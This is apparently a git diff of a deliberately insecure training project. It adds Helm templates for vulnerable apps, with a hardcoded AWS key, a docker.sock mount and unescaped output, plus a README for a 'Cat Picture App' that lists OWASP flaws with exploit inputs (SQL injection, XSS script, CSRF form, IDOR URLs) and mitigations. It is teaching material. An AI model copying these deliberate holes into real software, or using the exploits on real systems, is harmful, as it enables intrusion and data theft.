+{% endblock %} \ No newline at end of file diff --git a/insecure-app/templates/result.html b/insecure-app/templates/result.html new file mode 100644 index 0000000..0227e03 --- /dev/null +++ b/insecure-app/templates/result.html @@ -0,0 +1,11 @@ +{% extends "base.html" %} + +{% block title %}Insecure App - Results{% endblock %} + +{% block content %} +

Execution Results

+
+
{{ output|safe }}
+
+Back to Hacker's Playground +{% endblock %} \ No newline at end of file diff --git a/insecure-chart/Chart.yaml b/insecure-chart/Chart.yaml index 4c6241e..db29646 100644 --- a/insecure-chart/Chart.yaml +++ b/insecure-chart/Chart.yaml @@ -1,8 +1,8 @@ apiVersion: v2 -name: insecure-apps +name: insecure-app description: Intentionally insecure Helm chart for testing purposes type: application -version: 0.1.1 +version: 0.3.1 appVersion: "1.0.0" maintainers: - email: james@latio.tech diff --git a/insecure-chart/templates/busybox.yaml b/insecure-chart/templates/busybox.yaml index 1ea3cd5..8a41e0a 100644 --- a/insecure-chart/templates/busybox.yaml +++ b/insecure-chart/templates/busybox.yaml @@ -1,7 +1,7 @@ apiVersion: apps/v1 kind: Deployment metadata: - name: busybox-deployment + name: busybox namespace: {{ .Values.busybox.namespace }} labels: app: busybox @@ -17,4 +17,5 @@ spec: spec: containers: - name: busybox - image: busybox + image: {{ .Values.busybox.image }} + command: {{ toYaml .Values.busybox.command | nindent 8 }} diff --git a/insecure-chart/templates/insecure-ai.yaml b/insecure-chart/templates/insecure-ai.yaml new file mode 100644 index 0000000..3395ba3 --- /dev/null +++ b/insecure-chart/templates/insecure-ai.yaml @@ -0,0 +1,93 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureAi.namespace | default "insecure-ai" }} +--- +apiVersion: v1 +kind: Secret +metadata: + name: insecure-ai-secrets + namespace: {{ .Values.insecureAi.namespace | default "insecure-ai" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +type: Opaque +data: + openai-api-key: {{ .Values.insecureAi.env.openaiApiKey | b64enc }} + gemini-api-key: {{ .Values.insecureAi.env.geminiApiKey | b64enc }} +--- +apiVersion: v1 +kind: Service +metadata: + name: {{ .Values.insecureAi.service.name | default "insecure-ai" }} + namespace: {{ .Values.insecureAi.namespace | default "insecure-ai" }} +spec: + selector: + app: {{ .Values.insecureAi.appName | default "insecure-ai" }} + ports: + - port: {{ .Values.insecureAi.service.port | default 80 }} + targetPort: {{ .Values.insecureAi.service.targetPort | default 5000 }} + type: ClusterIP +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: {{ .Values.insecureAi.appName | default "insecure-ai" }} + namespace: {{ .Values.insecureAi.namespace | default "insecure-ai" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + replicas: {{ .Values.insecureAi.replicas | default 1 }} + selector: + matchLabels: + app: {{ .Values.insecureAi.appName | default "insecure-ai" }} + template: + metadata: + labels: + app: {{ .Values.insecureAi.appName | default "insecure-ai" }} + spec: + containers: + - name: {{ .Values.insecureAi.containerName | default "insecure-ai" }} + image: {{ .Values.insecureAi.image.repository }}:{{ .Values.insecureAi.image.tag | default "latest" }} + ports: + - containerPort: {{ .Values.insecureAi.containerPort | default 5000 }} + env: + - name: OPENAI_API_KEY + valueFrom: + secretKeyRef: + name: insecure-ai-secrets + key: openai-api-key + optional: true + - name: GEMINI_API_KEY + valueFrom: + secretKeyRef: + name: insecure-ai-secrets + key: gemini-api-key + optional: true +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: insecure-ai-ingress + namespace: {{ .Values.insecureAi.namespace | default "insecure-ai" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 + nginx.ingress.kubernetes.io/use-regex: "true" + meta.helm.sh/release-name: {{ .Release.Name }} + meta.helm.sh/release-namespace: {{ .Release.Namespace }} +spec: + ingressClassName: nginx + rules: + - http: + paths: + - path: /ai/?(.*) + pathType: ImplementationSpecific + backend: + service: + name: {{ .Values.insecureAi.service.name | default "insecure-ai" }} + port: + number: {{ .Values.insecureAi.service.port | default 80 }} \ No newline at end of file diff --git a/insecure-chart/templates/insecure-api.yaml b/insecure-chart/templates/insecure-api.yaml new file mode 100644 index 0000000..83770cc --- /dev/null +++ b/insecure-chart/templates/insecure-api.yaml @@ -0,0 +1,70 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureApi.namespace }} +--- +apiVersion: apps/v1 +kind: Deployment +metadata: + name: {{ .Values.insecureApi.appName }} + namespace: {{ .Values.insecureApi.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + replicas: {{ .Values.insecureApi.replicas }} + selector: + matchLabels: + app: {{ .Values.insecureApi.appName }} + template: + metadata: + labels: + app: {{ .Values.insecureApi.appName }} + spec: + containers: + - name: {{ .Values.insecureApi.containerName }} + image: {{ .Values.insecureApi.image.repository }}:{{ .Values.insecureApi.image.tag }} + ports: + - containerPort: {{ .Values.insecureApi.containerPort }} +--- +apiVersion: v1 +kind: Service +metadata: + name: {{ .Values.insecureApi.service.name }} + namespace: {{ .Values.insecureApi.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + selector: + app: {{ .Values.insecureApi.appName }} + ports: + - port: {{ .Values.insecureApi.service.port }} + targetPort: {{ .Values.insecureApi.service.targetPort }} + type: ClusterIP +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: insecure-api-ingress + namespace: {{ .Values.insecureApi.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 + nginx.ingress.kubernetes.io/use-regex: "true" + meta.helm.sh/release-name: {{ .Release.Name }} + meta.helm.sh/release-namespace: {{ .Release.Namespace }} +spec: + ingressClassName: nginx + rules: + - http: + paths: + - path: /api/?(.*) + pathType: ImplementationSpecific + backend: + service: + name: {{ .Values.insecureApi.service.name }} + port: + number: {{ .Values.insecureApi.service.port }} \ No newline at end of file diff --git a/insecure-chart/templates/insecure-app-js.yaml b/insecure-chart/templates/insecure-app-js.yaml index 72662b7..bd2046b 100644 --- a/insecure-chart/templates/insecure-app-js.yaml +++ b/insecure-chart/templates/insecure-app-js.yaml @@ -25,6 +25,9 @@ kind: Deployment metadata: name: {{ .Values.insecureJs.appName | default "insecure-js" }} namespace: {{ .Values.insecureJs.namespace | default "insecure-js" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} spec: replicas: {{ .Values.insecureJs.replicas | default 1 }} selector: @@ -44,3 +47,48 @@ spec: ports: - containerPort: {{ .Values.insecureJs.containerPort | default 3000 }} +--- + +apiVersion: v1 +kind: Service +metadata: + name: insecure-app-js + namespace: {{ .Values.insecureJs.namespace | default "insecure-js" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + type: ClusterIP + ports: + - port: 3000 + targetPort: 3000 + selector: + app: {{ .Values.insecureJs.appName | default "insecure-js" }} + +--- + +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: insecure-app-js-ingress + namespace: {{ .Values.insecureJs.namespace | default "insecure-js" }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} + annotations: + nginx.ingress.kubernetes.io/rewrite-target: / + meta.helm.sh/release-name: {{ .Release.Name }} + meta.helm.sh/release-namespace: {{ .Release.Namespace }} +spec: + ingressClassName: nginx + rules: + - http: + paths: + - path: /js + pathType: Prefix + backend: + service: + name: insecure-app-js + port: + number: 3000 + diff --git a/insecure-chart/templates/insecure-app.yaml b/insecure-chart/templates/insecure-app.yaml index eeb9e7f..6044161 100644 --- a/insecure-chart/templates/insecure-app.yaml +++ b/insecure-chart/templates/insecure-app.yaml @@ -4,6 +4,9 @@ kind: Deployment metadata: name: {{ .Values.insecureApp.appName }} namespace: {{ .Values.insecureApp.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} spec: replicas: {{ .Values.insecureApp.replicas }} selector: @@ -13,11 +16,15 @@ spec: metadata: labels: app: {{ .Values.insecureApp.appName }} + annotations: + kubescape.io/max-sniffing-time: "5m" spec: containers: - name: {{ .Values.insecureApp.appName }} image: "{{ .Values.insecureApp.image.repository }}:{{ .Values.insecureApp.image.tag }}" env: + - name: SCRIPT_NAME + value: /app - name: AWS_ACCESS_KEY_ID value: AKIA2JAPX77RGLB664VE - name: AWS_SECRET_ACCESS_KEY @@ -27,17 +34,25 @@ spec: volumeMounts: - name: docker-socket mountPath: /var/run/docker.sock + - name: data + mountPath: /data volumes: - name: docker-socket hostPath: path: /var/run/docker.sock + - name: data + persistentVolumeClaim: + claimName: insecure-app-data serviceAccountName: insecure-app-sa --- kind: Service apiVersion: v1 metadata: name: insecure-app - namespace: {{ .Release.Namespace }} + namespace: {{ .Values.insecureApp.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} spec: type: NodePort selector: @@ -54,6 +69,9 @@ kind: ClusterRole apiVersion: rbac.authorization.k8s.io/v1 metadata: name: insecure-app-role + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} rules: - apiGroups: [""] resources: ["pods", "serviceaccounts", "serviceaccounts/token"] @@ -63,10 +81,13 @@ kind: ClusterRoleBinding apiVersion: rbac.authorization.k8s.io/v1 metadata: name: insecure-app-role-binding + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} subjects: - kind: ServiceAccount name: insecure-app-sa - namespace: {{ .Release.Namespace }} + namespace: {{ .Values.insecureApp.namespace }} apiGroup: "" roleRef: kind: ClusterRole @@ -77,4 +98,33 @@ apiVersion: v1 kind: ServiceAccount metadata: name: insecure-app-sa - namespace: {{ .Release.Namespace }} \ No newline at end of file + namespace: {{ .Values.insecureApp.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: insecure-app-ingress + namespace: insecure-app + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 + nginx.ingress.kubernetes.io/use-regex: "true" + meta.helm.sh/release-name: {{ .Release.Name }} + meta.helm.sh/release-namespace: {{ .Release.Namespace }} +spec: + ingressClassName: nginx + rules: + - http: + paths: + - path: /app/?(.*) + pathType: ImplementationSpecific + backend: + service: + name: insecure-app + port: + number: 8080 \ No newline at end of file diff --git a/insecure-chart/templates/insecure-java.yaml b/insecure-chart/templates/insecure-java.yaml new file mode 100644 index 0000000..1811fb6 --- /dev/null +++ b/insecure-chart/templates/insecure-java.yaml @@ -0,0 +1,93 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureJava.namespace | default "insecure-java" }} +--- +apiVersion: v1 +kind: Service +metadata: + name: {{ .Values.insecureJava.service.name | default "insecure-java" }} + namespace: {{ .Values.insecureJava.namespace | default "insecure-java" }} +spec: + selector: + app: {{ .Values.insecureJava.appName | default "insecure-java" }} + ports: + - protocol: TCP + port: {{ .Values.insecureJava.service.port | default 3000 }} + targetPort: {{ .Values.insecureJava.service.targetPort | default 3000 }} + type: NodePort + + +--- + +apiVersion: apps/v1 +kind: Deployment +metadata: + name: {{ .Values.insecureJava.appName }} + namespace: {{ .Values.insecureJava.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + replicas: {{ .Values.insecureJava.replicas }} + selector: + matchLabels: + app: {{ .Values.insecureJava.appName }} + template: + metadata: + labels: + app: {{ .Values.insecureJava.appName }} + spec: + containers: + - name: {{ .Values.insecureJava.containerName | default "insecure-java" }} + image: "{{ .Values.insecureJava.image.repository }}:{{ .Values.insecureJava.image.tag }}" + env: + - name: NODE_OPTIONS + value: "--perf-basic-prof --interpreted-frames-native-stack" + ports: + - containerPort: {{ .Values.insecureJava.containerPort | default 3000 }} + +--- +apiVersion: v1 +kind: Service +metadata: + name: insecure-java + namespace: {{ .Values.insecureJava.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} +spec: + type: ClusterIP + ports: + - port: 8080 + targetPort: 8080 + selector: + app: {{ .Values.insecureJava.appName }} + +--- +apiVersion: networking.k8s.io/v1 +kind: Ingress +metadata: + name: insecure-java-ingress + namespace: {{ .Values.insecureJava.namespace }} + labels: + app.kubernetes.io/managed-by: {{ .Release.Service }} + app.kubernetes.io/instance: {{ .Release.Name }} + annotations: + nginx.ingress.kubernetes.io/rewrite-target: /$1 + nginx.ingress.kubernetes.io/use-regex: "true" + meta.helm.sh/release-name: {{ .Release.Name }} + meta.helm.sh/release-namespace: {{ .Release.Namespace }} +spec: + ingressClassName: nginx + rules: + - http: + paths: + - path: /java/?(.*) + pathType: ImplementationSpecific + backend: + service: + name: insecure-java + port: + number: 8080 + diff --git a/insecure-chart/templates/namespaces.yaml b/insecure-chart/templates/namespaces.yaml new file mode 100644 index 0000000..53fd501 --- /dev/null +++ b/insecure-chart/templates/namespaces.yaml @@ -0,0 +1,29 @@ +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureJs.namespace }} +--- +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureJava.namespace }} +--- +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureApp.namespace }} +--- +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.insecureApi.namespace }} +--- +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.workloadSecurityEvaluator.namespace }} +--- +apiVersion: v1 +kind: Namespace +metadata: + name: {{ .Values.busybox.namespace }} \ No newline at end of file diff --git a/insecure-chart/templates/pv.yaml b/insecure-chart/templates/pv.yaml new file mode 100644 index 0000000..cf6b876 --- /dev/null +++ b/insecure-chart/templates/pv.yaml @@ -0,0 +1,23 @@ +apiVersion: v1 +kind: PersistentVolume +metadata: + name: insecure-app-data +spec: + capacity: + storage: 1Gi + accessModes: + - ReadWriteOnce + hostPath: + path: /data +--- +apiVersion: v1 +kind: PersistentVolumeClaim +metadata: + name: insecure-app-data + namespace: insecure-app +spec: + accessModes: + - ReadWriteOnce + resources: + requests: + storage: 1Gi \ No newline at end of file diff --git a/insecure-chart/terraform.tfstate b/insecure-chart/terraform.tfstate deleted file mode 100644 index 0fe83f0..0000000 --- a/insecure-chart/terraform.tfstate +++ /dev/null @@ -1,9 +0,0 @@ -{ - "version": 4, - "terraform_version": "1.7.3", - "serial": 1, - "lineage": "c79ba788-13b7-7e0e-b711-7a02534f78dd", - "outputs": {}, - "resources": [], - "check_results": null -} diff --git a/insecure-chart/values.yaml b/insecure-chart/values.yaml index 6c8eac5..0409cae 100644 --- a/insecure-chart/values.yaml +++ b/insecure-chart/values.yaml @@ -33,7 +33,7 @@ busybox: command: ["sleep", "3600"] insecureApp: - namespace: default + namespace: insecure-app appName: insecure-app replicas: 1 image: @@ -44,7 +44,7 @@ insecureApp: ssh: 22 workloadSecurityEvaluator: - namespace: default + namespace: workload-security appName: workload-security-evaluator replicas: 1 image: @@ -53,3 +53,34 @@ workloadSecurityEvaluator: ports: http: 8080 ssh: 22 + +insecureApi: + namespace: insecure-api + appName: insecure-api + containerName: insecure-api + service: + name: insecure-api + port: 8000 + targetPort: 8000 + replicas: 1 + image: + repository: confusedcrib/insecure-api + tag: latest + containerPort: 8000 + +insecureAi: + namespace: insecure-ai + appName: insecure-ai + containerName: insecure-ai + service: + name: insecure-ai + port: 80 + targetPort: 5000 + replicas: 1 + image: + repository: confusedcrib/insecure-ai + tag: latest + containerPort: 5000 + env: + openaiApiKey: "" + geminiApiKey: "" \ No newline at end of file diff --git a/insecure-java/Dockerfile b/insecure-java/Dockerfile index d190b11..6d1f651 100644 --- a/insecure-java/Dockerfile +++ b/insecure-java/Dockerfile @@ -1,7 +1,17 @@ -FROM openjdk:17-jdk as build +# Build stage +FROM gradle:7.6.1-jdk17 AS build +WORKDIR /app +COPY . . +RUN gradle build --no-daemon -ARG JAR_FILE=./insecure-java/build/libs/insecure-java-0.0.1-SNAPSHOT.jar +# Run stage +FROM openjdk:17-slim +WORKDIR /app +COPY --from=build /app/build/libs/insecure-java-0.0.1-SNAPSHOT.jar app.jar -COPY ${JAR_FILE} app.jar +# Expose the port the app runs on +EXPOSE 8080 + +# Run the application +ENTRYPOINT ["java", "-jar", "app.jar"] -ENTRYPOINT ["java","-jar","/app.jar"] diff --git a/insecure-java/README.md b/insecure-java/README.md index 3b7005f..ece254a 100644 --- a/insecure-java/README.md +++ b/insecure-java/README.md @@ -1,3 +1,536 @@ +# **Cat Picture App \- Vulnerable Application for Educational Purposes** + +Welcome to the **Cat Picture App**, an intentionally vulnerable web application designed for educational purposes to demonstrate common security vulnerabilities as outlined in the OWASP Top 10\. This application allows users to explore how these vulnerabilities can manifest in real-world applications and understand the importance of secure coding practices. + +--- + +## **Table of Contents** + +* Introduction +* Getting Started + * Prerequisites + * Installation + * Running the Application +* Vulnerabilities + * 1\. Injection (SQL Injection) + * 2\. Broken Authentication + * 3\. Sensitive Data Exposure + * 4\. XML External Entities (XXE) + * 5\. Broken Access Control + * 6\. Security Misconfiguration + * 7\. Cross-Site Scripting (XSS) + * 8\. Insecure Deserialization + * 9\. Using Components with Known Vulnerabilities + * 10\. Insufficient Logging & Monitoring + * 11\. Insecure Direct Object References (IDOR) + * 12\. Cross-Site Request Forgery (CSRF) +* Important Notes +* Learning Resources +* License + +--- + +## **Introduction** + +The Cat Picture App is a simple web application that allows users to register, log in, add comments, search for cat pictures, and manage profiles. It intentionally contains multiple security vulnerabilities to help developers and security enthusiasts learn about common web application security issues. + +--- + +## **Getting Started** + +### **Prerequisites** + +* **Java Development Kit (JDK)**: Version 11 or higher +* **Gradle**: Version 6.x or higher +* **Internet Connection**: To download dependencies + +### **Installation** + +**Clone the Repository** +bash +Copy code +`git clone https://github.com/yourusername/cat-picture-app.git` + +1. + +**Navigate to the Project Directory** +bash +Copy code +`cd cat-picture-app` + +2. + +**Build the Project** +bash +Copy code +`./gradlew clean build` + +3. + +### **Running the Application** + +**Using Gradle** +bash +Copy code +`./gradlew bootRun` + +* + +**Access the Application** +Open your web browser and navigate to: +arduino +Copy code +`http://localhost:8080/` + +* + +--- + +## **Vulnerabilities** + +Below is a detailed list of the vulnerabilities present in this application, along with their locations and examples of how they can be exploited. + +--- + +### **1\. Injection (SQL Injection)** + +#### **Description** + +The application is vulnerable to SQL Injection, allowing attackers to manipulate database queries by injecting malicious SQL code through user inputs. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/CatPictureController.java` +* **Method:** `public String search(@RequestParam String name, Model model)` + +#### **Vulnerable Code** + +java +Copy code +`String query = "SELECT * FROM cat_pictures WHERE name = '" + name + "'";` +`List results = catPictureRepository.findByNameQuery(query);` + +#### **How to Exploit** + +**Navigate to the Search Page** +bash +Copy code +`http://localhost:8080/search` + +1. + +**Enter Malicious Input** +In the **Name** field, enter: +bash +Copy code +`' OR '1'='1` + +2. +3. **Submit the Form** + Click on the **Search** button. + +#### **Impact** + +* Attackers can bypass authentication mechanisms. +* Unauthorized access to data. +* Data manipulation or deletion. + +#### **Mitigation** + +* Use parameterized queries or prepared statements. +* Validate and sanitize user inputs. + +--- + +### **2\. Broken Authentication** + +#### **Description** + +The application has weak authentication mechanisms, storing passwords in plaintext and lacking proper session management. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/UserController.java` +* **Methods:** + * `public String register(@RequestParam String username, @RequestParam String password, Model model)` + * `public String login(@RequestParam String username, @RequestParam String password, Model model)` + +#### **Vulnerable Code** + +java +Copy code +`// Storing password in plaintext` +`user.setPassword(password);` +`userRepository.save(user);` + +#### **How to Exploit** + +1. **Register with a Simple Password** + * Username: `user1` + * Password: `password123` +2. **Login Using the Credentials** + * The password is stored in plaintext, making it vulnerable if the database is compromised. + +#### **Impact** + +* Attackers can easily compromise user accounts. +* Increased risk if database access is obtained. + +#### **Mitigation** + +* Store passwords securely using hashing algorithms like BCrypt. +* Implement secure session management. +* Enforce strong password policies. + +--- + +### **3\. Sensitive Data Exposure** + +#### **Description** + +Sensitive data such as passwords are stored and transmitted insecurely. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/models/User.java` + +#### **Vulnerable Code** + +java +Copy code +`private String password; // Password stored in plaintext` + +#### **How to Exploit** + +* If an attacker gains access to the database, they can read all user passwords. + +#### **Impact** + +* User accounts can be compromised. +* Potential for credential reuse attacks on other services. + +#### **Mitigation** + +* Encrypt sensitive data at rest and in transit. +* Implement proper access controls. +* Use HTTPS for secure communication. + +### **4\. Broken Access Control** + +#### **Description** + +The application lacks proper access control, allowing users to perform actions without authorization. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/CatPictureController.java` +* **Method:** `public String deletePicture(@RequestParam int id, Model model)` + +#### **Vulnerable Code** + +java +Copy code +`catPictureRepository.deleteById(id);` + +#### **How to Exploit** + +**Navigate to the Delete Picture Page** +bash +Copy code +`http://localhost:8080/delete` + +1. +2. **Enter Picture ID** + * Enter `1` in the **Picture ID** field. +3. **Submit the Form** + * Click on the **Delete** button. + +#### **Impact** + +* Unauthorized deletion of resources. +* Data loss or corruption. + +#### **Mitigation** + +* Implement authorization checks. +* Verify user permissions before performing actions. + +--- + +### **5\. Security Misconfiguration** + +#### **Description** + +The application exposes detailed error messages and lacks proper security headers. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/config/GlobalExceptionHandler.java` +* **File:** `src/main/resources/application.properties` + +#### **Vulnerable Code** + +java +Copy code +`// Exposing detailed error messages` +`@ResponseBody` +`public String handleAllExceptions(Exception ex) {` + `return ex.getMessage(); // Detailed exception message` +`}` + +properties +Copy code +`# Disabling security headers` +`spring.security.headers.content-security-policy=none` +`spring.security.headers.x-content-type-options=none` +`spring.security.headers.x-frame-options=none` +`spring.security.headers.x-xss-protection=0` + +#### **How to Exploit** + +* Trigger an error (e.g., access an undefined endpoint) to view detailed stack traces. +* Absence of security headers increases risk of attacks like clickjacking. + +#### **Impact** + +* Provides valuable information to attackers. +* Increased susceptibility to certain attacks. + +#### **Mitigation** + +* Configure global exception handling to show generic error messages. +* Enable and properly configure security headers. + +--- + +### **6\. Cross-Site Scripting (XSS)** + +#### **Description** + +User inputs are not sanitized, allowing attackers to inject malicious scripts. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/CommentController.java` +* **Template:** `src/main/resources/templates/comments.html` + +#### **Vulnerable Code** + +html +Copy code +`` +`
  • ` + +#### **How to Exploit** + +**Navigate to the Add Comment Page** +bash +Copy code +`http://localhost:8080/addComment` + +1. + +**Enter Malicious Input** +php +Copy code +`` + +2. +3. **Submit the Form** + * Click on the **Add Comment** button. +4. **View Comments** + * Navigate to `http://localhost:8080/comments` + * The script will execute. + +#### **Impact** + +* Execution of arbitrary scripts in users' browsers. +* Theft of user data or session hijacking. + +#### **Mitigation** + +* Sanitize and encode user inputs. +* Use `th:text` instead of `th:utext` in Thymeleaf templates. + +--- + +### **9\. Using Components with Known Vulnerabilities** + +#### **Description** + +Outdated dependencies may contain known vulnerabilities. + +#### **Location** + +* **File:** `build.gradle` + +#### **Vulnerable Code** + +gradle +Copy code +`dependencies {` + `// Using outdated versions` + `implementation 'org.springframework.boot:spring-boot-starter-web:2.7.3'` +`}` + +#### **How to Exploit** + +* Attackers can exploit known vulnerabilities in outdated libraries. + +#### **Impact** + +* Compromise of the application through library exploits. + +#### **Mitigation** + +* Regularly update dependencies. +* Use tools to monitor for known vulnerabilities. + +--- + +### **10\. Insecure Direct Object References (IDOR)** + +#### **Description** + +Users can access or modify resources by manipulating object identifiers without authorization. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/UserController.java` +* **Methods:** + * `public String viewProfile(@RequestParam int userId, Model model)` + * `public String editProfile(@RequestParam int userId, ...)` + +#### **Vulnerable Code** + +java +Copy code +`// No authorization check` +`User user = userRepository.findById(userId).orElse(null);` + +#### **How to Exploit** + +**View Another User's Profile** +bash +Copy code +`http://localhost:8080/profile?userId=2` + +1. + +**Edit Another User's Profile** +bash +Copy code +`http://localhost:8080/editProfile?userId=2` + +2. + +#### **Impact** + +* Unauthorized access to sensitive user data. +* Unauthorized modification of user profiles. + +#### **Mitigation** + +* Implement authorization checks to ensure users can only access their own data. +* Use session information to determine the current user. + +--- + +### **11\. Cross-Site Request Forgery (CSRF)** + +#### **Description** + +The application lacks CSRF protection, allowing attackers to perform actions on behalf of authenticated users. + +#### **Location** + +* **File:** `src/main/java/com/example/catapp/controllers/CommentController.java` +* **Method:** `public String deleteComment(@RequestParam int commentId, RedirectAttributes redirectAttributes)` + +#### **Vulnerable Code** + +java +Copy code +`// No CSRF token verification` +`commentRepository.deleteById(commentId);` + +#### **How to Exploit** + +**Craft a Malicious HTML Page** +html +Copy code +`
    ` + `` +`
    ` +`` + +1. +2. **Host the Page and Have an Authenticated User Visit It** + * The comment with ID `1` will be deleted without the user's consent. + +#### **Impact** + +* Unauthorized actions performed on behalf of users. +* Data loss or unwanted state changes. + +#### **Mitigation** + +* Implement CSRF protection using tokens. +* Use frameworks or libraries that handle CSRF automatically. + +--- + +## **Important Notes** + +* **Educational Purpose Only** + * This application is intentionally insecure and should only be used in controlled environments. + * Do not deploy this application in a production setting or expose it to untrusted networks. +* **Ethical Use** + * Use this application responsibly to learn about security vulnerabilities. + * Do not use this knowledge for malicious purposes. + +--- + +## **Learning Resources** + +* **OWASP Top 10** + * OWASP Top 10 Project +* **Secure Coding Practices** + * OWASP Secure Coding Practices +* **Spring Security** + * [Spring Security Reference](https://docs.spring.io/spring-security/site/docs/current/reference/html5/) +* **Thymeleaf Security** + * Thymeleaf Documentation +* **CSRF Protection** + * Understanding CSRF Attacks + +--- + +## **License** + +This project is licensed under the MIT License \- see the LICENSE file for details. + +--- + +**Disclaimer:** The vulnerabilities in this application are intentional and for educational purposes only. The authors are not responsible for any misuse of this application. + +--- + +# **Additional Information** + +Feel free to explore the codebase, experiment with the vulnerabilities, and most importantly, learn how to secure applications against such threats. + +For any questions or suggestions, please open an issue or submit a pull request. + +--- + +Happy Learning\! + + + +Old - Deserialization attack 1. javac Exploit.java 2. jar cf Exploit.jar Exploit.class 3. ```curl -X POST \ diff --git a/insecure-java/build.gradle b/insecure-java/build.gradle index 511a769..007a146 100644 --- a/insecure-java/build.gradle +++ b/insecure-java/build.gradle @@ -1,26 +1,42 @@ plugins { - id 'java' - id 'org.springframework.boot' version '3.2.4' - id 'io.spring.dependency-management' version '1.1.4' + id 'java' + id 'org.springframework.boot' version '2.7.3' // Use a compatible Spring Boot version + id 'io.spring.dependency-management' version '1.0.14.RELEASE' +} + +springBoot { + mainClass = 'com.example.catapp.CatAppApplication' } group = 'com.example' version = '0.0.1-SNAPSHOT' - -java { - sourceCompatibility = '17' -} +sourceCompatibility = '11' // Set your Java version here repositories { - mavenCentral() + mavenCentral() } dependencies { + // Spring Boot Starter Web implementation 'org.springframework.boot:spring-boot-starter-web' - developmentOnly 'org.springframework.boot:spring-boot-devtools' + + // Spring Data JPA + implementation 'org.springframework.boot:spring-boot-starter-data-jpa' + + // H2 Database (In-memory database) + runtimeOnly 'com.h2database:h2' + + // Thymeleaf Template Engine + implementation 'org.springframework.boot:spring-boot-starter-thymeleaf' + + // Lombok (Optional: Remove if not using Lombok) + compileOnly 'org.projectlombok:lombok' + annotationProcessor 'org.projectlombok:lombok' + + // Testing (Optional) testImplementation 'org.springframework.boot:spring-boot-starter-test' } tasks.named('test') { - useJUnitPlatform() + useJUnitPlatform() } diff --git a/insecure-java/build/bootJarMainClassName b/insecure-java/build/bootJarMainClassName new file mode 100644 index 0000000..3eefa8a --- /dev/null +++ b/insecure-java/build/bootJarMainClassName @@ -0,0 +1 @@ +com.example.catapp.CatAppApplication \ No newline at end of file diff --git a/insecure-java/build/bootRunMainClassName b/insecure-java/build/bootRunMainClassName new file mode 100644 index 0000000..3eefa8a --- /dev/null +++ b/insecure-java/build/bootRunMainClassName @@ -0,0 +1 @@ +com.example.catapp.CatAppApplication \ No newline at end of file diff --git a/insecure-java/build/classes/java/main/com/example/catapp/CatAppApplication.class b/insecure-java/build/classes/java/main/com/example/catapp/CatAppApplication.class new file mode 100644 index 0000000..120e238 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/CatAppApplication.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/config/GlobalExceptionHandler.class b/insecure-java/build/classes/java/main/com/example/catapp/config/GlobalExceptionHandler.class new file mode 100644 index 0000000..90e8bef Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/config/GlobalExceptionHandler.class differ diff --git a/insecure-java/build/classes/java/main/com/example/catapp/controllers/CatPictureController.class b/insecure-java/build/classes/java/main/com/example/catapp/controllers/CatPictureController.class new file mode 100644 index 0000000..514ea56 Binary files /dev/null and b/insecure-java/build/classes/java/main/com/example/catapp/controllers/CatPictureController.class differ diff --git 